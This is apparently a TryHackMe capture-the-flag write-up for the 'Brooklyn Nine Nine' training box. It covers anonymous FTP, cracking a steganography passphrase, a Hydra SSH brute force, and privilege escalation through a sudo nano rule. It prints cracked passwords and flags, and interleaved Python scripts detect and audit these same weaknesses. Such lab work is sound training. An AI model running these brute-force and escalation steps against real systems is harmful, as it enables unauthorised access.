TryHackMe - Brooklyn Nine Nine - Writeup

This room is aimed at beginner-level hackers, but anyone can try to hack this box. There are two main intended ways to root the box.

Nmap Scan

root@ip-10-10-251-78:~# nmap -sCV -A 10.10.201.193 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-18 11:05 BST
Nmap scan report for ip-10-10-201-193.eu-west-1.compute.internal (10.10.201.193)
Host is up (0.00056s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.251.78
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:44:F8:0D:32:A3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/18%OT=21%CT=1%CU=44079%PV=Y%DS=1%DC=D%G=Y%M=0244F8%T
OS:M=60CC7018%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.56 ms ip-10-10-201-193.eu-west-1.compute.internal (10.10.201.193)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds

Log in to FTP with the username anonymous and download the file note_to_jake.txt.

root@ip-10-10-251-78:~# ftp 10.10.201.193
Connected to 10.10.201.193.
220 (vsFTPd 3.0.3)
Name (10.10.201.193:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.07 secs (1.6486 kB/s)
root@ip-10-10-251-78:~# cat note_to_jake.txt
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

The "nine nine" hint is interesting; let's move on to the web part now.
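Before moving on, here is the same anonymous-FTP exposure seen from the server side. This is an added example, not code from the original writeup: the log lines are constructed in the default vsftpd.log format (the 10.10.251.78 client is the attacking machine from this writeup; 10.10.0.5 is made up), and the config check treats a missing anonymous_enable key as enabled because vsftpd's compiled-in default for that option is YES.

```python
import re
from collections import defaultdict

# Constructed sample in the default vsftpd.log format (not captured from the box).
# 10.10.251.78 is the attacking machine used in this writeup; 10.10.0.5 is made up.
SAMPLE_VSFTPD_LOG = """\
Fri Jun 18 11:09:58 2021 [pid 1210] CONNECT: Client "10.10.251.78"
Fri Jun 18 11:10:02 2021 [pid 1209] [ftp] OK LOGIN: Client "10.10.251.78", anon password "?"
Fri Jun 18 11:10:05 2021 [pid 1211] [ftp] OK DOWNLOAD: Client "10.10.251.78", "/note_to_jake.txt", 119 bytes, 1.65Kbyte/sec
Fri Jun 18 11:15:40 2021 [pid 1302] CONNECT: Client "10.10.0.5"
Fri Jun 18 11:15:44 2021 [pid 1301] [amy] OK LOGIN: Client "10.10.0.5"
Fri Jun 18 11:15:50 2021 [pid 1303] [amy] OK UPLOAD: Client "10.10.0.5", "/home/amy/report.txt", 2048 bytes, 10.00Kbyte/sec
"""

# vsftpd logs the anonymous account as [ftp] and records the e-mail-style
# "anon password"; real users appear under their own name with no such suffix.
LOGIN_RE = re.compile(r'\[(?P<user>[^\]]+)\] OK LOGIN: Client "(?P<ip>[^"]+)"(?P<anon>, anon password)?')
XFER_RE = re.compile(r'\[(?P<user>[^\]]+)\] OK (?:DOWNLOAD|UPLOAD): Client "(?P<ip>[^"]+)", "(?P<path>[^"]+)"')


def anonymous_activity(log_text):
    """Map each client IP that used the anonymous account to its login count
    and the files it transferred. Authenticated sessions are ignored."""
    per_ip = defaultdict(lambda: {"logins": 0, "files": []})
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m and m.group("anon"):
            per_ip[m.group("ip")]["logins"] += 1
            continue
        m = XFER_RE.search(line)
        if m and m.group("user") == "ftp":
            per_ip[m.group("ip")]["files"].append(m.group("path"))
    return dict(per_ip)


def anonymous_enabled(conf_text):
    """True when a vsftpd.conf body allows anonymous logins. vsftpd's compiled-in
    default for anonymous_enable is YES, so an absent key counts as enabled."""
    value = "YES"
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, val = line.partition("=")
        if key.strip() == "anonymous_enable":
            value = val.strip().upper()
    return value == "YES"


if __name__ == "__main__":
    for ip, info in anonymous_activity(SAMPLE_VSFTPD_LOG).items():
        print(f"{ip}: {info['logins']} anonymous login(s), files: {info['files']}")
    print("weak config allows anonymous:", anonymous_enabled("anonymous_enable=YES\n"))
    print("hardened config allows anonymous:", anonymous_enabled("anonymous_enable=NO\nlocal_enable=YES\n"))
```

Run against a real vsftpd.log, the first function tells you which addresses pulled which files over the anonymous account; the second is the one-line config fix to verify afterwards (anonymous_enable=NO, explicitly set rather than left to the default).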

Viewing the page source, we find an HTML comment that says: Have you ever heard of steganography?

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  margin: 0;
}

.bg {
  /* The image used */
  background-image: url("brooklyn99.jpg");

  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}
</style>
</head>
<body>

<div class="bg"></div>

<p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (when scrolled to top), and that it scales nicely on all screen sizes.</p>
<!-- Have you ever heard of steganography? -->
</body>
</html>

Download the image from http://10.10.201.193/brooklyn99.jpg and try to extract data from it with steghide.

root@ip-10-10-251-78:~/Downloads# steghide extract -sf brooklyn99.jpg
Enter passphrase: 
steghide: can not uncompress data. compressed data is corrupted.

It requires a passphrase; let's crack it with stegcracker.

root@ip-10-10-251-78:~/Downloads# stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: admin
Tried 20650 passwords
Your file has been written to: brooklyn99.jpg.out
admin

The "nine nine" in the FTP note points at brooklyn99.jpg. Now extract the hidden data from the image with the passphrase admin we just cracked.

root@ip-10-10-251-78:~/Downloads# steghide extract -sf brooklyn99.jpg
Enter passphrase: 
wrote extracted data to "note.txt".
root@ip-10-10-251-78:~/Downloads# cat note.txt
Holts Password:
fluffydog12@ninenine

Enjoy!!

I tried to log in to SSH as jake using the password we found, but it didn't work. Let's brute-force jake's SSH password instead.

root@ip-10-10-251-78:~/Downloads# hydra -t 16 -l jake -P /usr/share/wordlists/rockyou.txt 10.10.201.193 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2021-06-18 11:52:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.201.193:22/
[22][ssh] host: 10.10.201.193   login: jake   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2021-06-18 11:52:43
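A run like the one above is loud on the target: sshd writes one "Failed password" line per attempt to auth.log, then an "Accepted password" line for the same account. As an added example that is not part of the original writeup, here is a small detector over constructed auth.log-style lines (the hostname and the attacking address 10.10.251.78 follow this writeup; the timestamps, PIDs, ports and the amy traffic are made up) that flags a source address crossing a failure threshold inside a time window and, more importantly, reports any successful login from that address after the burst began.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log-style sshd lines (not captured from the box). The burst
# from 10.10.251.78 mimics what a Hydra run leaves behind: several failures
# per second for one account, then an accepted login for the same account.
SAMPLE_AUTH_LOG = """\
Jun 18 11:52:31 brookly_nine_nine sshd[2301]: Failed password for jake from 10.10.251.78 port 51200 ssh2
Jun 18 11:52:31 brookly_nine_nine sshd[2302]: Failed password for jake from 10.10.251.78 port 51201 ssh2
Jun 18 11:52:32 brookly_nine_nine sshd[2303]: Failed password for jake from 10.10.251.78 port 51202 ssh2
Jun 18 11:52:34 brookly_nine_nine sshd[2304]: Failed password for jake from 10.10.251.78 port 51203 ssh2
Jun 18 11:52:37 brookly_nine_nine sshd[2305]: Failed password for jake from 10.10.251.78 port 51204 ssh2
Jun 18 11:52:40 brookly_nine_nine sshd[2306]: Failed password for jake from 10.10.251.78 port 51205 ssh2
Jun 18 11:52:43 brookly_nine_nine sshd[2340]: Accepted password for jake from 10.10.251.78 port 51260 ssh2
Jun 18 11:53:10 brookly_nine_nine sshd[2350]: Failed password for amy from 10.10.0.5 port 40000 ssh2
Jun 18 11:53:20 brookly_nine_nine sshd[2351]: Accepted password for amy from 10.10.0.5 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_sshd_line(line):
    """Return a dict for password-auth result lines, None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime fills in 1900, which is fine
    # for measuring gaps inside one log file
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return {"ts": ts, "result": m.group("result"),
            "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag every source IP with `threshold` failed password attempts inside
    `window_seconds`, and list accepted logins from that IP after the burst
    began (the high-value signal: the guessing worked)."""
    events = [e for e in map(parse_sshd_line, log_text.splitlines()) if e]
    by_ip = defaultdict(lambda: {"failed": [], "accepted": []})
    for e in events:
        by_ip[e["ip"]]["failed" if e["result"] == "Failed" else "accepted"].append(e)

    window = timedelta(seconds=window_seconds)
    findings = []
    for ip, ev in by_ip.items():
        fails = sorted(ev["failed"], key=lambda e: e["ts"])
        # first run of `threshold` consecutive failures that fits in the window
        start = next((i for i in range(len(fails) - threshold + 1)
                      if fails[i + threshold - 1]["ts"] - fails[i]["ts"] <= window), None)
        if start is None:
            continue
        burst_start = fails[start]["ts"]
        findings.append({
            "ip": ip,
            "failures": len(fails),
            "users": sorted({e["user"] for e in fails}),
            "success_after": [(e["user"], e["ts"].strftime("%H:%M:%S"))
                              for e in ev["accepted"] if e["ts"] >= burst_start],
        })
    return findings


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{f['ip']}: {f['failures']} failures against {f['users']}, "
              f"successful logins after burst: {f['success_after']}")
```

The threshold and window are deliberately parameters: a single mistyped password (amy above) never trips the rule, while a wordlist run does within its first few seconds. The "success_after" list is what turns a noisy alert into an incident, and it is exactly the trace a weak password like jake's leaves behind; rate limiting (fail2ban or a firewall rule on repeated SYNs to 22) and key-only authentication remove the attack surface rather than just logging it.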

We got jake's password. Let's log in with 987654321.

root@ip-10-10-251-78:~/Downloads# ssh jake@10.10.201.193
jake@10.10.201.193's password: 
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ cd /home
jake@brookly_nine_nine:/home$ l
amy/  holt/  jake/

Since we know holt's password, and I didn't find any user.txt on the machine as jake, switch user to holt.

jake@brookly_nine_nine:~$ su holt
Password: 
holt@brookly_nine_nine:/home/jake$ 
holt@brookly_nine_nine:/home/jake$ ls
holt@brookly_nine_nine:/home/jake$ cd ..
holt@brookly_nine_nine:/home$ ls
amy  holt  jake
holt@brookly_nine_nine:/home$ cd holt
holt@brookly_nine_nine:~$ ls
nano.save  user.txt
holt@brookly_nine_nine:~$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee

Now let's get root. My first approach is to run sudo -l to list holt's sudo rules.

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano

holt can run nano as root without a password. Look up nano on GTFOBins.
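The root cause here is a sudoers rule, so the defender's check is a sudoers audit rather than a nano patch. As an added example (not code from the original writeup), this script parses the command section of `sudo -l` output and flags rules that amount to a root shell: the sample is constructed to mirror holt's rule above, with a second, made-up systemctl rule that passes the audit; the list of shell-escape binaries is a hypothetical starter set, with GTFOBins as the reference for the rest.

```python
import re
from pathlib import PurePosixPath

# Constructed `sudo -l` output modelled on the writeup's holt user; the second
# rule is made up to show a non-interactive command that passes the audit.
SAMPLE_SUDO_L = """\
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano
    (root) /usr/bin/systemctl restart apache2
"""

# Starter list (hypothetical, not exhaustive) of interactive programs whose
# documented shell-escape or file-write features make a sudo rule for them
# equivalent to root; GTFOBins is the reference for the full set.
SHELL_ESCAPE_BINS = {"nano", "vim", "vi", "less", "more", "find"}

# "(runas) TAG: TAG: command, command" as printed by sudo -l
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*?)\s*$")


def parse_sudo_l(text):
    """Parse the command section of `sudo -l` output into one entry per command."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for spec in m.group("cmds").split(","):
            entries.append({"runas": m.group("runas").strip(),
                            "tags": tags, "command": spec.strip()})
    return entries


def audit(entries):
    """Return findings for rules that amount to an unrestricted root shell."""
    findings = []
    for e in entries:
        cmd = e["command"]
        prog = PurePosixPath(cmd.split()[0]).name
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command")
        elif prog in SHELL_ESCAPE_BINS:
            reasons.append(f"{prog} has a documented shell escape")
        if not reasons:
            continue
        if "NOPASSWD" in e["tags"]:
            reasons.append("no password required")
        fix = ("scope the rule to specific commands" if cmd == "ALL"
               else "use sudoedit for file edits, or a non-interactive wrapper script")
        findings.append({"command": cmd, "runas": e["runas"], "reasons": reasons, "fix": fix})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{f['command']} as ({f['runas']}): {'; '.join(f['reasons'])} -> {f['fix']}")
```

For the holt rule the fix is to drop the nano entry entirely and, if holt genuinely needs to edit a specific root-owned file, grant `sudoedit /path/to/that/file` instead: sudoedit copies the file to a temporary location, runs the editor as the invoking user, and only copies the result back as root, so an editor shell escape no longer yields a root shell.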

Follow the commands listed there and you'll get root.

# whoami
root
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845

Enjoy!!

Room Link: Brooklyn Nine Nine

Written on June 18, 2021